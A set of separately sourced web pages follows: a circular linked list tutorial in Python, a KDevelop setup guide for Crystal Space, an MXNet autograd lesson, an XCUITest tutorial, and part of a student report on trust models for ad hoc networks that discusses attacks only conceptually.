            self.head = None
            print("All nodes are deleted successfully.")

    #display the content of the list
    def PrintList(self):
        if(self.head != None):
            temp = self.head
            print("The list contains:", end=" ")
            while(True):
                print(temp.data, end=" ")
                temp = temp.next
                if(temp == self.head):
                    break
            print()
        else:
            print("The list is empty.")

# test the code
MyList = LinkedList()

#Add four elements in the list.
MyList.push_back(10)
MyList.push_back(20)
MyList.push_back(30)
MyList.push_back(40)
MyList.PrintList()

#delete all nodes of the list
MyList.deleteAllNodes()

#Display the content of the list.
MyList.PrintList()

The above code will give the following output:

The list contains: 10 20 30 40
All nodes are deleted successfully.
The list is empty.
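One property worth confirming is that after deleteAllNodes the list object is still usable: new pushes start a fresh circular list. The sketch below re-declares compact versions of the article's classes so it is self-contained (names and the size helper are mine); note that it also uses head.prev as the tail to make push_back O(1), a design alternative to the article's O(n) traversal to the last node:

```python
class Node:
    def __init__(self, data):
        self.data = data
        self.next = None
        self.prev = None

class CircularDLL:
    """Minimal circular doubly linked list for a before/after size check."""

    def __init__(self):
        self.head = None

    def push_back(self, data):
        node = Node(data)
        if self.head is None:
            self.head = node
            node.next = node.prev = node
        else:
            tail = self.head.prev       # circularity gives the tail in O(1)
            tail.next = node
            node.prev = tail
            node.next = self.head
            self.head.prev = node

    def delete_all_nodes(self):
        # Dropping head unlinks the whole ring; Python's GC reclaims the nodes.
        self.head = None

    def size(self):
        if self.head is None:
            return 0
        count, temp = 1, self.head.next
        while temp != self.head:
            count += 1
            temp = temp.next
        return count
```

In CPython, a plain circular list would leak under pure reference counting, but the cycle collector handles rings of nodes, so dropping head is enough.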
https://www.alphacodingskills.com/python/ds/python-delete-all-nodes-of-the-circular-doubly-linked-list.php
In this short tutorial I will guide you through some basic steps in order to create a Crystal Space application using the KDevelop IDE. First of all, you need to have a compiled and working version of Crystal Space, see "Building and Installing Crystal Space". Note: The screenshots embedded on this page are reduced versions. Click on them for the full resolution image. Now open KDevelop C/C++ IDE and click on Project -> New. A wizard appears and you should see a screen similar to this: Now, as shown in the screenshot, choose C++ and Simple Hello world program. In the properties area, enter your preferred application name and a location to store the source and additional files in. The path can be located anywhere you like and does not have to be in the Crystal Space source directory. Just make sure you have sufficient r/w permissions and drive space available. The next step of the wizard takes you to this screen: Here you can enter your name, e-mail and the version and license type of your application. In the next step you can optionally set up a version control system, which is useful for larger projects. I will not go into detail here, since this is not part of this tutorial: The next two screens show the templates for the .h and .cpp source files, you may want to keep the copyright stuff in there: So much for warm-up, lets get down to the nitty-gritty. A screen similar to the one below appears, now open the project properties page by clicking Project and Project Options: A new window pops up where you can configure several project-specific settings, you can take a look through them to make sure everything is in order. Click on Configure Options and enter a new configuration name, here it is CrystalSpace. Now, important is to click on 'Add' before actually entering anything in the below fields. Now you have created a new configuration profile and you can enter the Crystal-Space specific settings as shown:. 
Basically you can copy-paste (and if needed, edit) the following:

And at the next tab (C tab):

And at the C++ tab:

In the 'run' options tab on the left-hand side, you can enter some arguments to the program, e.g. '-mode=1280x1024 -fs' or '-bugplug'.

Now let's see if you're lucky. Click Build and Run automake & friends.

Before you can start, you have to insert the obligatory lines for Crystal Space applications in your .cpp file: #include <crystalspace.h> (in the screenshot: <cssysdef.h>, because of an older version of Crystal Space) and CS_IMPLEMENT_APPLICATION. In addition you may need to modify the signature of the main function the following way:

For testing purposes, you can try out the 'simple1.cpp' and 'simple1.h' source files from the Crystal Space code tree. These files can be found within the Crystal Space source code tree at the following location: 'CS/apps/tutorial/simple1'.

Now you should be able to compile your application and make some shiny game with Crystal Space! That's all there is to it. If you have trouble, you are welcome to check out the Crystal Space IRC channel for help or drop me a note.

Written by Jan Hendriks (DaHoC, DaHoC3150 [@] gmail.com)
Last major update 10.08.2007, using KDevelop 3.4.1, Crystal Space 1.3, CEL 1.3 (both svn trunk version)
http://www.crystalspace3d.org/mediawiki/index.php?title=KDevelop_tutorial&diff=3403&oldid=2608
2.3. Automatic Differentiation

In machine learning, we train models, updating them successively so that they get better and better as they see more and more data. Usually, getting better means minimizing a loss function, a score that answers the question "how bad is our model?" With neural networks, we typically choose loss functions that are differentiable with respect to our parameters. Put simply, this means that for each of the model's parameters, we can determine how much increasing or decreasing it might affect the loss. While the calculations for taking these derivatives are straightforward, requiring only some basic calculus, for complex models, working out the updates by hand can be a pain (and often error-prone). The autograd package expedites this work by automatically calculating derivatives: it builds a compute graph and fills in the partial derivatives with respect to each parameter. If you are unfamiliar with some of the math, e.g. gradients, please refer to the "Mathematical Basics" section in the appendix.

In [1]:
from mxnet import autograd, nd

2.3.1. A Simple Example

As a toy example, say that we are interested in differentiating the mapping \(y = 2\mathbf{x}^{\top}\mathbf{x}\) with respect to the column vector \(\mathbf{x}\). To start, let's create the variable x and assign it an initial value.

In [2]:
x = nd.arange(4).reshape((4, 1))
print(x)

[[0.]
 [1.]
 [2.]
 [3.]]
<NDArray 4x1 @cpu(0)>

Once we compute the gradient of y with respect to x, we will need a place to store it. We can tell an NDArray that we plan to store a gradient by invoking its attach_grad() method.

In [3]:
x.attach_grad()

Now we are going to compute y, and MXNet will generate a computation graph on the fly. In some cases, the same model behaves differently in training and prediction modes (e.g. when using neural techniques such as dropout and batch normalization). In other cases, some models may store more auxiliary variables to make computing gradients easier. We will cover these differences in detail in later chapters. For now, you do not need to worry about them.
To have MXNet record the computation, we place it inside an autograd.record() scope:

In [4]:
with autograd.record():
    y = 2 * nd.dot(x.T, x)

We then call the backward function to calculate the gradient:

In [5]:
y.backward()

2.3.6. Exercises

- this paper by Edelman, Ostrovski and Schwartz, 2005.
- Why is the second derivative much more expensive to compute than the first derivative?
- Derive the head gradient relationship for the chain rule. If you get stuck, use the "Chain Rule" article on Wikipedia.
- Assume \(f(x) = \sin(x)\). Plot \(f(x)\) and \(\frac{df(x)}{dx}\) on a graph, where you compute the latter without any symbolic calculations, i.e. without exploiting that \(f'(x) = \cos(x)\).
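The last exercise asks for a derivative computed without any symbolic calculation, and central finite differences do exactly that. The same trick also sanity-checks the worked example: for \(y = 2\mathbf{x}^{\top}\mathbf{x}\), the analytic gradient is \(4\mathbf{x}\). A plain-Python sketch (no MXNet needed; the helper names are mine):

```python
def y(x):
    # y = 2 * x^T x for a vector x represented as a list of floats.
    return 2 * sum(v * v for v in x)

def numerical_gradient(f, x, eps=1e-6):
    # Central differences: perturb one coordinate at a time.
    grad = []
    for i in range(len(x)):
        hi = x[:]
        hi[i] += eps
        lo = x[:]
        lo[i] -= eps
        grad.append((f(hi) - f(lo)) / (2 * eps))
    return grad
```

For x = [0, 1, 2, 3] this recovers [0, 4, 8, 12] up to floating-point error, matching the gradient MXNet stores in x.grad after y.backward().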
http://d2l.ai/chapter_crashcourse/autograd.html
An introduction to testing with XCUITest

User interface testing can be tricky to get right, so in this tutorial we're going to take an app that has no UI tests and upgrade it so you can see exactly how the process works. The project we'll be using is a simple sandbox with a variety of controls – you can download it here.

Give the example app a try now – it's a simple sandbox app with a small amount of functionality. This example gives us a variety of controls to work with, which should allow for some interesting UI tests.

If you didn't see the on-screen keyboard when the text field was selected, you should go to the Hardware menu and uncheck Keyboard > Connect Hardware Keyboard. XCUITest does not work great with hardware keyboards, so you should use the on-screen one to be sure.

Note: This sandbox app is specifically about user interface testing. Where possible, regular unit tests are preferable. UI testing is notoriously flaky, and ideally you should make most of your app independent of the user interface – if you can avoid using import UIKit, that's a good sign!

Right now the app doesn't have anywhere to add UI tests, so the first step is to add a new target. Go to the File menu and choose New > Target. You'll see a long list of possible targets, but I'd like you to scroll down and select iOS UI Testing Bundle, then click Next. Xcode's default options might be OK, but check the team option to make sure it's configured for your team.

Finally, look inside the XCUITestSandboxUITests group and open XCUITestSandboxUITests.swift for editing. Like regular tests, you'll see setUp() and tearDown() methods that run before and after your tests to make sure they are in a consistent state. You'll also see an empty test method to get us started, called testExample().

For now I want to focus on the setUp() method, which should contain code like this:

// In UI tests it is usually best to stop immediately when a failure occurs.
continueAfterFailure = false

// In UI tests it's important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this.
XCUIApplication().launch()
That second comment is important: you need to make sure the app is configured in a very specific way, otherwise you're likely to have tests fail sporadically. While you can put code after that comment to force your app to be in a specific state, most good tests I've seen use a much more robust approach: pass in a command-line parameter that the app can read and adapt to.

To pass in a testing flag, replace the call to XCUIApplication().launch() with this:

let app = XCUIApplication()
app.launchArguments = ["enable-testing"]
app.launch()

That will pass "enable-testing" to the app when it's launched, which we can then make it detect and respond to. Our sandbox app doesn't have any initial state to worry about, but if you needed to configure your app in a certain way then you would add something like this to your main app:

#if DEBUG
if CommandLine.arguments.contains("enable-testing") {
    configureTestingState()
}
#endif

What configureTestingState() does is down to you – you might load some preconfigured data, for example.

Warning: If you're shipping a macOS app that enables a testing mode using command-line flags, make sure you wrap your command-line arguments check using #if DEBUG, otherwise real users can enable your testing mode.

To start with, we're going to use Xcode's test recording system to write some code. Xcode watches what you do inside the simulator and translates your taps and swipes into Swift code – or at least tries to. Click inside the testExample() method, and you should see a red recording button become active directly below the code area – next to where the breakpoint and debugging buttons are. Go ahead and press that button now, and you should see Xcode build and launch your app. Here's what I'd like you to do when the app launches:

- Tap the text field and type "test", then press Return.
- Swipe the slider to the right.
- Tap the Omega segment.
- Tap the Blue button, then tap OK on the alert that appears.

As you take those actions, code will be written directly into the testExample() method, more or less matching what you're doing on-screen.
I say "more or less" because in practice this is the flakiest part of XCTest: it generates terrible code that often won't compile. Here's the code it generated for me when I followed the above actions:

let app = app2
app.otherElements.containing(.navigationBar, identifier: "Alpha").children(matching: .other).element.children(matching: .other).element.children(matching: .other).element.children(matching: .other).element.children(matching: .textField).element.tap()

let tKey = app.keys["t"]
tKey.tap()
tKey.tap()

let eKey = app.keys["e"]
eKey.tap()
eKey.tap()

let sKey = app.keys["s"]
sKey.tap()
sKey.tap()
tKey.tap()
tKey.tap()

let app2 = app
app2.buttons["Return"].tap()
app.sliders["50%"].swipeRight()
app2.buttons["Omega"].tap()
app.buttons["Blue"].tap()
app.alerts["Blue"].buttons["OK"].tap()

Wherever you see some code with a blue background color, click the micro-sized arrow to the right of it to see other possible interpretations of that code.

That code has a number of problems:

- The first line, let app = app2, is meaningless because app2 isn't defined.
- It chains .element.children(matching: .other) repeatedly for no real reason.
- It identifies the slider as sliders["50%"] – that's its value, which means it will change.
- It records a swipeRight(), rather than a precise movement to a value.

Not only is this code so bad that it won't compile, but it's so bad it actually crashed my Swift compiler – see SR-7517. This code doesn't actually test anything yet, but before we can write tests we need to make it work. So, please change it to this:

func testExample() {
    let app = XCUIApplication()
    app.textFields.element.tap()
    app.keys["t"].tap()
    app.keys["e"].tap()
    app.keys["s"].tap()
    app.keys["t"].tap()
    app.keyboards.buttons["Return"].tap()
    app.sliders["50%"].swipeRight()
    app.segmentedControls.buttons["Omega"].tap()
    app.buttons["Blue"].tap()
    app.alerts["Blue"].buttons["OK"].tap()
}

That does all the work we want, but it's significantly less code, and for bonus points actually compiles.
Note: In case you were unfamiliar, XCTest expects all test cases to start with the word "test" and return nothing.

XCUITest is built around the concept of queries: you navigate through your UI using calls that get evaluated at runtime. You can navigate in a variety of ways, which is why both app.buttons["Omega"].tap() and app.segmentedControls.buttons["Omega"].tap() are valid – as long as XCUITest finds a button with the title "Omega" somewhere then it's happy.

If you noticed, there are two ways of accessing a specific element:

app.textFields.element.tap()
app.buttons["Blue"].tap()

The first option is used when the query – textFields – only matches one item. If our app had only one button, we could have used app.buttons.element.tap() to tap it. The second option is used when you need to select a specific item. Using app.buttons["Blue"] effectively means "the button that has the title 'Blue'", but this approach is problematic, as can be seen here:

app.sliders["50%"].swipeRight()

Sliders don't have titles, so Xcode identified it using its value. This was 50% to begin with, but that's a really confusing way to refer to user interface elements, so iOS gives us a better solution called accessibility identifiers. All UIKit interface objects can be given these text strings to identify them uniquely for user interface testing. To try this out, open Main.storyboard and select the slider. Select the identity inspector, then enter "Completion" for its accessibility identifier.
However, we still don’t have any tests, so let’s write those now. Take a copy of the testExample() method and call it testLabelCopiesTextField(), like this: func testLabelCopiesTextField() { let app = XCUIApplication() app.textFields.element.tap() app.keys["t"].tap() app.keys["e"].tap() app.keys["s"].tap() app.keys["t"].tap() app.keyboards.buttons["Return"].tap() app.sliders["Completion"].swipeRight() app.segmentedControls.buttons["Omega"].tap() app.buttons["Blue"].tap() app.alerts["Blue"].buttons["OK"].tap() } Now delete its last four lines, but make some space where we can write a test: func testLabelCopiesTextField() { let app = XCUIApplication() app.textFields.element.tap() app.keys["t"].tap() app.keys["e"].tap() app.keys["s"].tap() app.keys["t"].tap() app.keyboards.buttons["Return"].tap() // test goes here } As for the test itself, this uses the same XCTAssert() functions you should already be using with unit tests. For example, XCTAssertTrue() will consider your test to have passed if its condition is true. In this case we want to check whether the label contains the text “test”, which is done like this: XCTAssertTrue(app.staticTexts.element.label == "test") Put that directly below the // test goes here comment. You might be wondering why we must use staticTexts rather than labels, but keep in mind XCUITest is cross-platform – AppKit on macOS blurs the lines between text fields and labels, so using something generic like “staticTexts” makes sense on both platforms. You can try that test now if you want – if you press Cmd+B to build your code you should see an empty gray diamond to the left of func testLabelCopiesTextField(), and clicking that will run the test. Next we’re going to test the slider and progress view, because moving the slider to the right should move the progress view to the left. 
Copy the app.sliders["Completion"].swipeRight() line into its own test called testSliderControlsProgress(), like this:

func testSliderControlsProgress() {
    app.sliders["Completion"].swipeRight()
}

You’ll need to copy the definition for app too, making this:

func testSliderControlsProgress() {
    let app = XCUIApplication()
    app.sliders["Completion"].swipeRight()
}

The swipeRight() method call was generated by Xcode, but it’s really not fit for purpose here because it doesn’t mention how far the test should swipe. To fix this we need to replace swipeRight() with a call to adjust(toNormalizedSliderPosition:). As the name suggests, this takes normalized slider positions, meaning that you refer to the leading edge as 0 and the trailing edge as 1 even if your slider counts from 0 to 100. Here’s how that looks in code:

func testSliderControlsProgress() {
    let app = XCUIApplication()
    app.sliders["Completion"].adjust(toNormalizedSliderPosition: 1)
}

Now for the complicated part: writing a test. This is complicated by three things:

1. There is no progressViews property inside app. Instead, you must use progressIndicators.
2. The value of the progress indicator comes back as Any? – anything at all, or perhaps nothing.
3. We’ll conditionally typecast that Any? to a string, and if that fails for some reason we’ll call XCTFail() then end the test.

Here’s how the test should look:

func testSliderControlsProgress() {
    let app = XCUIApplication()
    app.sliders["Completion"].adjust(toNormalizedSliderPosition: 1)

    guard let completion = app.progressIndicators.element.value as? String else {
        XCTFail()
        return
    }

    XCTAssertTrue(completion == "0%")
}

For our last test we’re going to make sure that tapping colors shows an alert. Start by copying app.buttons["Blue"].tap() and app.alerts["Blue"].buttons["OK"].tap() into their own testButtonsShowAlerts() test, then add the usual let app = XCUIApplication() line to the top.
It should look like this:

func testButtonsShowAlerts() {
    let app = XCUIApplication()
    app.buttons["Blue"].tap()
    app.alerts["Blue"].buttons["OK"].tap()
}

Between the second and third lines of that method we need to write a new test: does an alert exist with the title “Blue”? XCUITest has a dedicated exists property for this purpose, so we can test for the alert in just one line of code:

func testButtonsShowAlerts() {
    let app = XCUIApplication()
    app.buttons["Blue"].tap()
    XCTAssertTrue(app.alerts["Blue"].exists)
    app.alerts["Blue"].buttons["OK"].tap()
}

At this point we’ve refactored all the code from testExample() into individual tests, so you can delete testExample() entirely.

That’s all our code tested, so we can now run all the tests at the same time. To make that happen, scroll up to the top of XCUITestSandboxUITests and click to the left of class XCUITestSandboxUITests – it might be a green checkmark or a red cross depending on what state your tests are in. As Xcode runs all the tests you’ll see it start and stop the app multiple times, ensuring that your code runs from a clean state each time.

If everything has gone to plan, once the test runs finish you should see a green checkmark next to your class – everything passed. Good job!

If you'd like to learn more about Xcode UI testing, you should read my Xcode UI Testing Cheat Sheet – it's full of solutions to common real-world problems.
https://www.hackingwithswift.com/articles/83/how-to-test-your-user-interface-using-xcode
ELECTRICAL AND COMPUTER ENGINEERING
Senior Design Project II 0402492
TRUST MODEL FOR AD HOC NETWORKS
Spring 2008/2009
By:
• Osama Khaled Al-Koky (20510076)
• Waleed S. Hammad (20510327)
Supervisor:
• Dr. Ibrahim Kamel

Abstract
The fast-growing popularity of ad hoc networks has urged research into countering the security concerns arising from malicious nodes taking part in the construction of a trusted network. This project highlights some of the efforts that have been made to achieve a trustful ad-hoc network, and then illustrates how its proposed model differs from the related work. The project proposes a collaboration model that utilizes past interactions to identify malicious peers in ad-hoc networks. Peers may seek recommendations about an unknown node from other trusted peers before they decide to collaborate with it. The model takes into account oscillating peers, which exhibit honest behavior for a period of time and then later become malicious. Also, in this project, we simulate the proposed model and conduct several experiments to verify the model’s robustness.

Table of Contents
Table of Figures
Table of Equations
Table of Acronyms and Symbols
1. Introduction
1.1. Purpose and Motivation
1.2. Ad hoc Network
1.3. Centralized vs. Decentralized Trust
2. Problem definition
2.1. Scope
2.2. Attacks in ad-hoc networks
3. Related Work
3.1. Centralized Trust
3.2. Decentralized Trust
4. Model and Assumptions
4.1. Collaboration Model
4.2. Attack Model
4.3. Details of the Proposed Model
4.4. Bootstrapping
4.5. Redemption
5. Performance measures
5.1.1. Percentage of risky interactions
5.1.2. The speed of detecting a malicious node
6. Experiments
6.1. Assumptions and Relaxations
6.2. Simulation Scheme
6.3. Defenseless vs. fortified
6.4. Speed of detecting a malicious node
6.4.1. Speed of detecting a non-cooperating malicious node
6.4.2. Speed of detecting a cooperating malicious node
6.5. Speed of detecting a malicious oscillating node
6.5.1. Speed of recovering an honest oscillating node
6.5.2. IDS error rate vs. number of risky interactions
6.5.3. Weight of second hand experience vs. percentage of risky interactions
7. Conclusion
References
Appendix I: Simulator code
Class ToT node
network
Main

Table of Figures
Figure 1: Collaboration between different devices in a public place
Figure 2: Use of ad-hoc networks in disaster recovery
Figure 3: Categorization of trust models
Figure 4: Table of Trust
Figure 5: Collaboration flow diagram
Figure 6: Defenseless vs. fortified
Figure 7: Speed of detecting a malicious node
Figure 8: Speed of detecting a collaborating malicious node
Figure 9: Speed of detecting an oscillating malicious node
Figure 10: Speed of recovering an honest oscillating node
Figure 11: IDS error rate vs. percentage of risky interactions
Figure 12: Weight of second hand experience vs. percentage of risky interactions

Table of Equations
Equation (1)
Equation (2)
Equation (3)

Table of Acronyms and Symbols
• PIE: Past Interactions Experience
• T_acc: Trust Acceptance threshold
• IDS: Intrusion Detection System
• ToT: Table of Trust
• α: Weight of Second Hand Experience
• δ: Initialization Distance

1. Introduction

1.1. Purpose and Motivation
People in public places such as airports and train stations can share resources with each other, using their portable PCs, PDAs, or any portable or stationary communication device in the area. For example, a person with a mobile phone that has no internet access could ask for information from another person whose PDA has internet coverage, or a person with a PDA needing an operation that requires heavy processing power (e.g., video editing or heavy image editing) can ask another person using a laptop to carry out the operation (see Figure 1). This type of environment is called an ad-hoc network; a brief description of this is given in the following section.
The problem arising with ad-hoc networks is that they bring up the need to deal with strangers or anonymous people in open public places, in the absence of central systems that can govern those interactions. This may result in privacy breaches or may infect systems with viruses. Still, the ease of forming a network under ad-hoc networking makes it a popular method for interacting with others, thus urging research to provide better methods for making ad-hoc networks a safe communication environment.

1.2. Ad hoc Network
An ad-hoc (or "spontaneous") network is a local area network, especially one with wireless or temporary plug-in connections, in which some of the network devices are part of the network only for the duration of a communication session or, in the case of mobile or portable devices, while in close proximity to the rest of the network. In Latin, ad hoc literally means "for this"; a further meaning is "for this purpose only", and thus usually temporary [1]. The network is created, operated and managed by the nodes themselves, without the use of any existing network infrastructure or centralized administration. The nodes assist each other by passing data and control packets from one node to another, often beyond the wireless range of the original sender. This union of nodes forms an arbitrary topology. The nodes are free to move randomly and organize themselves arbitrarily; thus, the network's wireless topology may change rapidly and unpredictably. The decentralized nature of wireless ad hoc networks makes them suitable for a variety of applications where central nodes cannot be relied on, and may improve the scalability of networks compared to wireless managed networks. Such a network may operate in a standalone fashion, or may be connected to the larger Internet. Minimal configuration and quick deployment make ad hoc networks suitable for emergency situations like disaster recovery (see Figure 2) or military conflicts.
The execution and survival of an ad-hoc network is highly dependent upon the cooperative and trusting nature of its nodes.

1.3. Centralized vs. Decentralized Trust
In centralized trust we need a party that is trusted by all nodes in the network, and this party is responsible for calculating the trust for each and every node in the network. Systems like eBay and Amazon can use a centralized trust authority since users are stationary and have a fixed account. This scheme has some disadvantages. First, there is only a single authority, whose failure means the failure of the whole system. Second, trust is relative, which means that the trust of a certain node may differ from one node to another; and since ad-hoc networks are established on the fly, it is difficult to create a centralized authority.

In decentralized trust, on the other hand, nodes themselves have to organize the network, and each node computes the trust of its neighbors by monitoring their behaviors and taking recommendations from other nodes that have experience with the node it is seeking to collaborate with. In ad-hoc networks, nodes do not necessarily know each other, so they cannot know whether they are collaborating with a legitimate node or a malicious one. This leads to the need for a trust model that organizes the network without a centralized unit.

2. Problem definition

2.1. Scope
In our model, the main concern is to provide a trustful community that can find and eliminate malicious nodes. We also focus our efforts on the level of services provided by or required from the node, rather than on forwarding or receiving packets. Thus, our model does not consider attacks on the routing and network layer, but rather attacks at the services level.

2.2. Attacks in ad-hoc networks
There is a wide variety of attacks that target the weaknesses of ad-hoc networks.
Attacks in ad-hoc networks can be classified into two major categories according to the means of attack: passive attacks and active attacks. A passive attack obtains data exchanged in the network without disrupting the operation of the communications, while an active attack involves information interruption, modification, or fabrication. Examples of passive attacks include eavesdropping, traffic analysis, and traffic monitoring. Examples of active attacks include jamming, impersonating, modification, denial of service (DoS), and message replay [13].

Attacks on networks can also be either external or internal. External attacks are carried out by nodes that do not belong to the domain of the network. Internal attacks come from compromised nodes which are actually part of the network. Internal attacks are more severe than external attacks, since the insider knows valuable and secret information and possesses privileged access rights.

More sophisticated and subtle attacks have been identified in recent research papers. The black hole, Byzantine, and wormhole [14] attacks are typical examples. But those types of attacks target the network layer, and thus routing, which is not the scope of our trust model. Rather, attacks on the application layer are the sort of attacks our model is concerned with. Application layer communication is vulnerable in terms of security compared with other layers. The application layer contains user data, and it normally supports many protocols such as HTTP, SMTP, TELNET, and FTP, which provide many vulnerabilities and access points for attackers [13]. Application layer attacks are attractive to attackers because the information sought ultimately resides within the application, and it is straightforward for them to make an impact and reach their goals. There are mainly two types of attacks on the application layer: malicious code attacks and repudiation attacks.
Malicious code, such as viruses, worms, spyware, and Trojan horses, can attack both operating systems and user applications. Malicious programs usually can spread themselves through the network and cause the computer systems and the network to slow down or even be damaged. In the network layer, firewalls can be installed to keep packets in or keep packets out. In the transport layer, entire connections can be encrypted end-to-end. But these solutions do not solve the authentication or non-repudiation problems in the application layer. Repudiation refers to a denial of participation in all or part of the communication. For example, a selfish node could deny conducting an operation on a credit card purchase, or deny any on-line bank transaction, which is the prototypical repudiation attack on a commercial system [13].

3. Related Work
A great deal of research has been carried out in the field of network trust. These efforts can be categorized based on network topology or on the implementation of the trust. Based on network topology, there is trust for peer-to-peer networks and trust for ad hoc networks. Several papers have been published on P2P trust [11] [12]. However, these models have high overhead, which is not suitable for ad-hoc networks since mobile devices have limited energy and low processing capabilities. Based on the implementation of trust, we can categorize trust models as centralized and decentralized, which is what we are going to focus on in our project. A detailed discussion of centralized and decentralized trust follows in the next sections.

3.1. Centralized Trust
In centralized trust we need a party that is trusted by all nodes in the network, and this party is responsible for calculating the trust for each and every node in the network. Systems like eBay and Amazon use centralized trust authorities since users are stationary and have fixed accounts.
In eBay, after each interaction the user gives a value for the satisfaction of the interaction: (1) for positive, (-1) for negative and (0) for neutral. The decision whether to interact with a certain user or not has to be made by a human. This also makes the system not fully automated, since there is human intervention in making a decision based on the reputation of a user. This scheme has some other disadvantages as well. First, there is only a single authority, which suffers from a single point of failure. This might not be severe in an Internet environment, but it is more severe in an ad-hoc network, where nodes can be highly mobile and connect to and disconnect from the network frequently. Another problem of the centralized trust model is that there will be a global trust value for each single node. However, trust is usually subjective [5]; that is, A may have a trust value for C that is different from that of B. For example, a malicious user A may not be interested in attacking a normal user B, which means that B will have a high trust value for A. On the other hand, A might be interested in attacking user C (e.g., a bank or financial institute), which means that C will have a low trust value for A.

In ad-hoc networks, on the other hand, nodes themselves have to organize the network, and each node computes the trust of its neighbors by monitoring their behaviors and taking recommendations from other nodes that have experience with the node it is seeking to collaborate with. Centralized trust models are difficult to apply in ad-hoc networks, since the luxury of having a centralized unit is very difficult to achieve.

Trust models can also be categorized based on the application or network topology. There are three main categories: internet applications, peer-to-peer, and ad hoc networks. Peer-to-peer networks are very similar to ad-hoc networks in that both are self-organized and decentralized.
Most peer-to-peer systems work on the wired internet [6], which makes the topology somewhat known. Since nodes are connected to the internet, most of them are static and have virtually unlimited power and processing capabilities, which makes a heavy trust model feasible. In peer-to-peer we can assume the existence of some pretrusted nodes that are trusted by most peers in the network. We can even have a central authority to keep users’ profiles and manage the trust, since everything is on the known internet.

A good example of internet applications is web services. Trust in web services could be either from the point of view of the web service itself or from the point of view of the user of the service. Web services can evaluate users’ trust based on their profiles and their behavior. They also use a third-party central authority for trust management. This model cannot be applied to ad hoc networks because of the use of user profiles. The dynamic nature of ad-hoc networks makes keeping user profiles difficult, since users can be part of several networks and the profile of each node needs to be stored at every other node in the network due to the absence of a centralized unit. Users can trust web services using any authentication technique, like X.509 [1].

3.2. Decentralized Trust
Pretty Good Privacy (PGP) encryption uses public-key cryptography and includes a system which binds the public keys to a user name and/or an e-mail address. It was generally known as a web of trust, in contrast with the X.509 system [3]. It became a popular trust system replacement for centralized trust. However, for access-restricted ad-hoc networks, it has been shown to be unsuitable for the following reasons:
• It assumes a sufficient density of certificate graphs, which is a problem at network initialization due to the time delay to set up.
• Certificate chains provide weak authentication: one or more compromised nodes in a certificate chain can lead to unsuccessful authentication [15].
The EigenTrust [6] mechanism aggregates trust information from peers by having them perform a distributed calculation approaching the eigenvector of the trust matrix over the peers. EigenTrust relies on a good choice of some pretrusted peers, which are supposed to be trusted by all peers. This assumption may be over-optimistic in a distributed computing environment. The reason is that pretrusted peers may not last forever. Once they score badly after some transactions, the EigenTrust system may not work reliably.

Prakash V. and Vikram L. [7] proposed a collaborative trust model for secure routing. Their model is based on monitoring neighbor nodes for routing actions and issuing a single intrusion detection (SID) upon observing a malicious action. The routing behaviors that are monitored to detect a malicious behavior are:
• SIDs issued against a node.
• The difference between the number of beacons a node is expected to send and the number of beacons it actually sends.
• The difference between the number of acknowledgements a node is expected to send and the actual number of acknowledgements it sends.

The monitoring mechanism is the one used in SCAN [8], which monitors the routing updates and the packet forwarding behaviors of neighbor nodes. When a node observes a malicious activity from one of its neighbors, it issues an SID against it. However, other nodes will not accept the SID blindly; instead, a node will check the trust of the node that issued the SID, request recommendations from other nodes as well, and, if the compromised node is in radio range, monitor it for a period and then decide whether to accept the SID or not. When a node wants to calculate the trust for a remote neighbor, the node requests the trust value from its neighbors who are in the range of that node. The node then calculates the bad trust value as a weighted average, and then computes the route as a shortest-path problem based on the trust values of the nodes.
The shortcomings of this model are that it does not address the problem of oscillating nodes, and the processing and memory overhead of the model is very high.

In TOMS [5], Y. Ren and A. Boukerche established a trust management system that allows only trustworthy intermediate nodes to participate in the path construction process while also providing anonymity to the communicating parties. The trust model is distributed to each node in the network, and all nodes update their own assessments concerning other nodes accordingly. The routes set up in this way will traverse the most trustworthy nodes in each hop. The multicast mechanism used among nodes utilizes the trust as a requirement in order to choose the most satisfactory neighbors for conveying messages. The main factors in calculating the trust of a node in this model are the time this node spends in the community and the past activity record of the node. In most trust computation models, the trust value is generally computed based on a linear function. However, in TOMS they propose a trust model that updates the trust value based on different increase shapes.

The above-mentioned related work is concerned with how to implement trust through routing-related algorithms. And this is where our model comes in with a different scope in mind: to secure the services on the node from attack by malicious nodes.

The PowerTrust [9] system dynamically selects a small number of power nodes that are most reputable, using a distributed ranking mechanism. In this model, peer feedbacks follow a power-law distribution. By using a look-ahead random walk strategy and leveraging the power nodes, PowerTrust significantly improves global reputation accuracy and aggregation speed. PowerTrust is adaptable to dynamics in peers joining and leaving, and robust to disturbance by malicious peers.
The previous models suffer from several shortcomings which make them either weak or more suitable for peer-to-peer networks than for ad-hoc networks. The shortcomings of these models can be summarized in the following points. They assume the existence of some pretrusted nodes, which means they make an implicit assumption that the network already exists and has been running for some time. Also, they do not address the issue of bootstrapping the network, which is crucial.

Our proposed model differs from previous models in several points. First, we implement our model on the application layer; that is, we care only about attacks on this layer. Second, we assume that there is no network running, we do not rely on pretrusted nodes, and we consider the issue of bootstrapping the network. Finally, our biggest contribution is that we take care of nodes that exhibit oscillating behavior. The oscillating node issue can be very dangerous for the network. For example, a malicious node can join the network and behave honestly for a certain period of time until it gains a high trust value from most of the nodes, and then start issuing attacks. Another scenario is that of an honest node being compromised by a malicious node or software. This makes its trust go down until no one interacts with it anymore. Nevertheless, the node can recover; but because its trust is so low, the other nodes will still deny future interactions. This brings the need for a mechanism to deal with oscillating nodes efficiently.

4. Model and Assumptions
Our model is based on the past interactions between nodes and the recommendations taken from neighbor nodes. We are not considering routing; rather, we are considering using the model for any type of interaction.

4.1. Collaboration Model
We are considering a wireless ad hoc network which consists of an unconstrained number of nodes. Nodes can be mobile phones, PCs, PDAs or any other portable communication device.
Nodes can join and leave the network at any point of time, and they can be stationary or mobile. We assume that each node has a unique MAC address that cannot be altered. The network might also have an unconstrained number of malicious nodes. A node may ask a neighbor node for a certain service such as using the internet, a shared printer, computing power, routing a packet to a certain destination, or any other distributed service. We assume the existence of a protection system on the nodes of the network, which can be an antivirus, an IDS, or other protection and detection software. We model this protection system as a probabilistic value, which means that the system will detect a malicious activity with a certain probability.

4.2. Attack Model
